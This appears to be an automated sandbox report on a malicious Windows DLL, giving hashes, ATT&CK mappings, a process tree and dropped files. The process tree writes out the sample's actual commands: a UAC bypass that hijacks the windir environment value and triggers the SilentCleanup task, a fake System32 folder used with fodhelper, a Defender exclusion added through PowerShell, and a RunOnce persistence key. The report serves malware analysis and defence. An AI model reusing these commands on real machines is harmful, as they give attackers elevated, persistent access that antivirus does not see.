Analysis
-
max time kernel
95s -
max time network
122s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
03/08/2024, 06:15
Behavioral task
behavioral1
Sample
1722665588f6a10a8d47978db043c0d88290ea59d87f6f171d81ce7d2c526450e0e458c96a643.dll
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
1722665588f6a10a8d47978db043c0d88290ea59d87f6f171d81ce7d2c526450e0e458c96a643.dll
Resource
win10v2004-20240802-en
General
-
Target
1722665588f6a10a8d47978db043c0d88290ea59d87f6f171d81ce7d2c526450e0e458c96a643.dll
-
Size
510KB
-
MD5
70e861048b8ead49d3b57d864f6bfd06
-
SHA1
3aec782b57d4f925bdfdb5ed6d7fb0b2d35aa7ab
-
SHA256
914cc7f0a4c7df6fb793b2f75e91fe6003fb146e2bd1024c49a4ab6cfe0c162c
-
SHA512
c7b704506698d2e34ff01c2dff20ab6dac6719ddbb2be6e46e082220caf7ffd76b71d865db0c6b312775f31b1ee5325e0214909e84251d05c6377334aadcd0a3
-
SSDEEP
6144:z8Xyaz+kda/tgbyKxUyyi9LU8CIxjgUaJLi6SaJys9FWh11o+OGP7IWK:Kz+Ntndi9EW3a4zmWh1RZDE
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4528 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 1684 fodhelper.exe -
Loads dropped DLL 1 IoCs
pid Process 1684 fodhelper.exe -
Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs
UAC Bypass Attempt via SilentCleanup Task.
pid Process 3220 schtasks.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4716 4788 WerFault.exe 83 -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Notepad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 3 IoCs
pid Process 4340 reg.exe 4336 reg.exe 2296 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4528 powershell.exe 4528 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4528 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5036 wrote to memory of 4788 5036 rundll32.exe 83 PID 5036 wrote to memory of 4788 5036 rundll32.exe 83 PID 5036 wrote to memory of 4788 5036 rundll32.exe 83 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85 PID 4788 wrote to memory of 2904 4788 rundll32.exe 85
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\1722665588f6a10a8d47978db043c0d88290ea59d87f6f171d81ce7d2c526450e0e458c96a643.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\1722665588f6a10a8d47978db043c0d88290ea59d87f6f171d81ce7d2c526450e0e458c96a643.dll,#12⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\Notepad.exeC:\Windows\System32\Notepad.exe3⤵
- System Location Discovery: System Language Discovery
PID:2904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:2152 -
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4340
-
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I5⤵
- Abuse Elevation Control Mechanism: Bypass User Account Control
- System Location Discovery: System Language Discovery
PID:3220
-
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f5⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5056 -
C:\Windows \System32\fodhelper.exe"C:\Windows \System32\fodhelper.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat6⤵PID:1428
-
C:\Windows\system32\cmd.execmd /c C:\Users\Public\x.vbs7⤵
- Checks computer location settings
- Modifies registry class
PID:944 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"8⤵
- Checks computer location settings
PID:1620 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "9⤵PID:1952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 10123⤵
- Program crash
PID:4716
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4788 -ip 47881⤵PID:4580
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
283B
MD55cc1682955fd9f5800a8f1530c9a4334
SHA1e09b6a4d729f2f4760ee42520ec30c3192c85548
SHA2565562cc607d2f698327efacc4a21bd079bb14a99b03e7a01b3c67f8440e341cb3
SHA51280767263aad44c739236161d4338d5dd8b0b58613f22cd173c3e88ebf143220ee56bbf93ace69a07d3c2f00daff0adbaa8461a1d53d12699725395c931c43cb6
-
Filesize
226B
MD5f6828e22e6abe87c624e4683fac5889b
SHA1b93d63354d4ddb226dab90955576a6d2cad05ba0
SHA256e1b1884353a51436f90dfed9f85ed9dd98fccfbd13dee7aa54fd901f77fe5e9c
SHA51226afb36afcb3f286b85ebd72061e26f84c33075d3d0767cc93f50ec414a85838c86049e0c56ff43011d1a309b98ae355cbe412203429ac243010dc971ac81ec1
-
Filesize
295B
MD5b442a70fdba934a802a468446c697646
SHA1fe28bd0ab4831dc3bd71b774bdfac829b8806a35
SHA256c8dbdd9043f83f13287d442bcd98d06376d19a1d82f4e1dd4c9449f9b2ae0c7d
SHA51247b6d6396db728ad358c8104632f2be9e305ae674f2b08d501a68cded63c462316cdd18e861d9d411958b1012aaac4620239ca6029db6112285a8e06134d1903
-
Filesize
46KB
MD57215c73ec1aae35b9e4b1f22c811f85c
SHA198551f5184691b65dceba531c4e4975d77cd25a5
SHA2567e80da8d839dcf05e30317256460ed7a4ee25cab2750d768569aaab35e1e8c64
SHA512b68eed48dbd32e485fd56b952e3e642f25f1eefe26ea533b13857e225272ee9668c39552284a438175a323d1685a80d9f878ef0637b5d928bb1e1ed1ac505d61
-
Filesize
108KB
MD5487766bf2f0add388cb123d1ef7ece46
SHA1766564c04d9e8a6745baa2ad28da5d68ad1d79bf
SHA256fa5d5f9bd3a3aece8941e52a00d05db8910d3332f4f276bc03663c7944ae11cb
SHA5123b5c285c4eb749c5e34405b38e146e9fc3fe28c535ee12c4e0f075e167768f37b588e50c2dbd43a27b67b11e7483ad51fcd6b6e7638059dd40bc303c664a8a7e
-
Filesize
36B
MD547b8b6e888806f25ee24e55a6b116262
SHA11fbb022a6c3183f21806c19230a8ad421df9a2ae
SHA25661e8f32d99ac46e7eab3e976b0afcadc55ad837d696f0b2a003fe9cd4f34335e
SHA512a240e3b7f1a529da2dba304786da101548a039306c63f28c34f60973319ba37564e51493d021cd2c2adae4eecd98e8d6dd80e8b46472a6f6e7d1b069d000317a
-
Filesize
260B
MD570f4e3618d69b36ca74f412ac75ec1fa
SHA159fb651c5c976c86f3e02811b0250ca7dc10eb3a
SHA256c120ecbb33c2092fe379bcd2edbd702ea0a571ec99c233f8441e70e8ac62efd9
SHA512fa4aa79f35d4d5999f5237aaf46314a2de0c88ba8ea3c4a33be50fbeb53d9bb201033965e4aee17be13081a082daaaed3aae5c84181f24e9723b762a453bf191